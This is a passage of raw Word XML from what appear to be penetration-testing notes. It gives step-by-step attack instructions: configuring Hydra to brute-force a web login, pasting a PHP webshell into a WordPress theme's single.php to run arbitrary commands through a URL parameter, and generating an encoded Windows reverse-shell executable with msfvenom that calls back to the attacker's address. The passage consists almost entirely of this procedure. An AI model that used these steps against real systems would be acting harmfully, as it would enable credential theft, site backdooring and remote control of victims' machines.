            <w:r w:rsidR="00D2620F" w:rsidRPr="00D2620F">
              <w:t>separator</w:t>
            </w:r>
            <w:r w:rsidR="00D2620F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AAE7ED0" w14:textId="77777777" w:rsidR="009105AD" w:rsidRDefault="00D2620F" w:rsidP="00FB4F4D">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E68D43C" wp14:editId="0CD2CEC4">
                  <wp:extent cx="1775460" cy="511222"/>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53622" t="82010" r="1343" b="4440"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1785876" cy="514221"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:extLst>
                            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                            </a:ext>
                          </a:extLst>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E55AD3C" w14:textId="77777777" w:rsidR="00D2620F" w:rsidRDefault="00D2620F" w:rsidP="00FB4F4D">
            <w:r>
              <w:t xml:space="preserve">Now, substitute in </w:t>
            </w:r>
            <w:r w:rsidRPr="00114E2E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">^USER^ </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="00114E2E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">^PASS^ </w:t>
            </w:r>
            <w:r>
              <w:t>as the values for these parameters, like such…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36CEF1B5" w14:textId="77777777" w:rsidR="00D2620F" w:rsidRDefault="00114E2E" w:rsidP="00FB4F4D">
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>username=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>^USER^</w:t>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>&amp;password=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>^PASS^</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00114E2E">
              <w:t xml:space="preserve">or, </w:t>
            </w:r>
            <w:r>
              <w:t>if you know the username, type that…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1568FAD5" w14:textId="77777777" w:rsidR="00114E2E" w:rsidRDefault="00114E2E" w:rsidP="00FB4F4D">
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>username=</w:t>
            </w:r>
            <w:r w:rsidRPr="00114E2E">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r w:rsidRPr="00114E2E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>password=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B815BD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>^PASS^</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00114E2E">
              <w:t>in this case, you know the username is admin.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F1BAEA" w14:textId="77777777" w:rsidR="00114E2E" w:rsidRDefault="00114E2E" w:rsidP="00FB4F4D"/>
          <w:p w14:paraId="4D88B4DC" w14:textId="431E046A" w:rsidR="00114E2E" w:rsidRPr="004D1DE9" w:rsidRDefault="00114E2E" w:rsidP="00FB4F4D">
            <w:r>
              <w:t xml:space="preserve">Next, don’t forget a colon </w:t>
            </w:r>
            <w:r w:rsidRPr="00114E2E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">as the separator as we need one final thing - the text that Hydra knows if it sees, this was an unsuccessful login attempt. If it doesn’t see this text on the page, then Hydra will report a success. Copy and paste the text that the webpage returns when you enter and send an invalid request, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>e.g.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00D0630B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>Incorrect Cred</w:t>
            </w:r>
            <w:r w:rsidR="00D0630B" w:rsidRPr="00D0630B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>entials</w:t>
            </w:r>
            <w:r w:rsidR="00D0630B">
              <w:t>’. Finally, give Hydra time and it will let you know soon as it finds anything.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1C35" w14:paraId="5566B4CB" w14:textId="77777777" w:rsidTr="001D1C35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="096B5FBE" w14:textId="77777777" w:rsidR="001D1C35" w:rsidRDefault="001D1C35" w:rsidP="00854B38"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7744B39F" w14:textId="77777777" w:rsidR="001D1C35" w:rsidRDefault="001D1C35" w:rsidP="00854B38"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21ABC30E" w14:textId="77777777" w:rsidR="001D1C35" w:rsidRDefault="001D1C35" w:rsidP="00854B38"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AE7684A" w14:textId="023173EF" w:rsidR="00B2011D" w:rsidRDefault="00B2011D" w:rsidP="00B2011D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidR="007F52E3">
        <w:t xml:space="preserve"> Backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploitation With Theme Editor</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="985"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="499"/>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="8113"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA7204" w14:paraId="04228BE5" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79BE2A5B" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F6BE4BD" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Log In To Wordpress</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Section of Website</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>As Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3932EDEB" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRPr="00322D20" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF YOU CAN LOG IN AS ADMIN AND TH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>ERE</w:t>
            </w:r>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> IS WORDPRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DE203E" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204"/>
          <w:p w14:paraId="7187DC7D" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>After a successful log into a wordpress server as admin, navigate to ‘Theme’s.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>From here, navigate to ‘Theme Editor’. These are usually tabs on the left hand side of the browser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="5B045A8C" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C5D73A2" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6829E477" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Exploit via the theme editor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A2EA889" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRPr="00EC64F5" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>The theme title is important, keep that in mind.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>You will need the realpath url of the theme page you are on. Followed by a Single Post page title, usually single.php</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">It usually goes </w:t>
            </w:r>
            <w:r w:rsidRPr="00A43815">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>X.X.X.X/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>wordpress/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A43815">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>wp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A43815">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>-content/themes/THEMENAME/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>single.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="22A331E4" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51129156" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="505E8056" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="546E32E4" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>We can use a simple php backdoor via code found at:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007F52E3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r w:rsidRPr="007F52E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/webshells/php/simple-backdoor.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="111AFA4B" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69BDC23B" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2FD1396F" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="089535AA" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use the </w:t>
            </w:r>
            <w:r w:rsidRPr="007F52E3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">command to view the code, copy&amp;paste it into the Single Post page code area on your browser, likely called: </w:t>
            </w:r>
            <w:r w:rsidRPr="007F52E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>single.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F38622B" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRPr="007F52E3" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>Then click ‘Update File’ near the bottom of the screen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="1605FE9E" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5300CD96" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60DBD220" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C18FF46" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>In a new tab, type in:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009032E4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>X.X.X.X/wordpress/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009032E4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>wp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009032E4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>-content/themes/THEMENAME/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009032E4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>single.php?cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009032E4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">After the </w:t>
            </w:r>
            <w:r w:rsidRPr="00D806EE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">use whatever command you wish, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D806EE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">dir </w:t>
            </w:r>
            <w:r>
              <w:t>is a good first one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="69C47FA2" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F05B34F" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18BCDB95" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20409C9A" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>Now, with success here, we may be able to get a reverse shell.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Use the following command to create an .exe file for us to upload.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> windows/shell_reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LHOST=</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>YOURIPADDRESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LPORT=</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1234</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-e</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>x86/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>shikata_ga_nai</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-i</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-o</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>reverse.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="00101F05" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
